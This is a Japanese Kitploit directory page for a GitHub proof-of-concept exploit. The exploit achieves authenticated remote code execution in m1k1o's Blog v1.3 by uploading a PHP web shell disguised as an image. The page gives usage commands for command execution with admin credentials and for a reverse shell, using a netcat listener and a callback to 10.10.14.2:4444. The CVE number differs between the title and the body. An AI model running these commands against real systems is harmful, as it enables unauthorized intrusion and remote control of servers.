Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2022-23636-poc — 認証済みのリモートコード実行エクスプロイト:m1k1o's Blog v1.3 における未検証ファイルアップロードを介したもので、Webシェルの展開とリバースシェルの機能を備えています。 | Kitploit
ツール/GitHubGitHub/cyhe50/cve-2022-23636-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubcyhe50/cve-2022-23636-poc

cve-2022-23636-poc

認証済みのリモートコード実行エクスプロイト:m1k1o's Blog v1.3 における未検証ファイルアップロードを介したもので、Webシェルの展開とリバースシェルの機能を備えています。

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-23626 - m1k1oのブログ 認証済みRCE

m1k1oのブログ v1.3以下におけるファイルアップロードの脆弱性を利用した認証済みリモートコード実行

説明

ajax.php?action=upload_imageエンドポイントはアップロードされたファイルタイプを適切に検証しないため、認証済みユーザーが画像に偽装したPHPウェブシェルをアップロードできます。攻撃者はその後、アップロードされたファイルに直接リクエストすることで実行をトリガーできます。

参照

  • EDB-50943
  • CVE-2022-23626
  • m1k1o/blog GitHub

影響を受けるバージョン

  • m1k1oのブログ v1.3 以下

必要条件

  • Python 3
  • requests ライブラリ
root@kitploit:~
pip install requests

使用法

コマンドの実行

root@kitploit:~
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"

リバースシェル

まずリスナーを起動します:

root@kitploit:~
nc -lnvp 4444

次に実行:

root@kitploit:~
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444

免責事項

このツールは、許可されたセキュリティテストおよび教育目的のみを対象としています。テストする明示的な許可があるシステムでのみ使用してください。

ツールをダウンロード